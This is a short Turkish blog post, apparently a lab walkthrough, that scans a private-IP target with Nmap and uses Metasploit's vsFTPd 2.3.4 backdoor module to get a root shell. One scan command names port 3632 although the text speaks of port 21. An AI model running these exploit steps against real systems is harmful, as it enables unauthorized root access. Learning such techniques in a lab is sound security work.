FTP Nedir? Dosya Aktarım iletişimi (ing: File Transfer Protocol;FTP), bir veri yığınının - ASCII, EBCDIC, ve binary- uç aygıttan diğer a...

File Transfer Protocol (FTP) | 21/tcp | Pentesting

9/30/2017 0 Yorumlar

ftp ile ilgili görsel sonucu

FTP Nedir?

Dosya Aktarım iletişimi (ing: File Transfer Protocol;FTP), bir veri yığınının - ASCII, EBCDIC, ve binary- uç aygıttan diğer aygıta aktarımı için kullanılmaktadır.

Oncelikle hedef sisteme Nmap adlı tool ile port taraması yaptık ve 21/tcp portunun açık olduğunu, FTP protoklünün dışarıyla bağlantı sağlarken, diğer cihazlarla iletişimini sağlarken bu port’u kullandığını gorduk.

"nmap -sV -p 3632 192.168.198.129" -> nmap -sS -p <taranacak_port> <hedef_ip> şeklinde yazdık.



###############################################################

"search ftp_version" -> FTP protoklünün hangi sürümünü kullanduğını öğrenmek için ftp_version modülünü kullanacağız.

"set RHOSTS" -> set komutuyla RemoteHost yani kurbanın ip adresini girdik.



###############################################################



vsFTPd 2.3.4 sürümünü kullandığını gördük.

"back" -> exploitten çıktık.

"search vsFTPd 2.3.4" -> Metasploit içerisinden bu adın geçtiği exploiti bulmak için arama yaptık.

"use exp_name" -> use komutuyla exploit’i kullanacağız.

exploit(vsFTPd_234_backdoor)"show options" -> Exploit’in sisteme erişmesi için gerekli ayarlamaların neler olduğunu öğrenmek için bu komutu kullandık.



###############################################################

Gereken ayarlamaların, hedef ip & sistemin hangi port üzerinde bu servisin kullanıldığını ayarlamak olduğunu gördük, port 21 olarak default değer olarak atanmış zaten bize düşen kurbanın ip adresini girmek

exploit(vsFTPd_234_backdoor)"set RHOSTS" -> Hedef ip yazıyoruz.

exploit(vsFTPd_234_backdoor)"exploit" -> Sızma işlemini başlatıyoruz.



Bingoo Rootuz :)



###############################################################

0 yorum: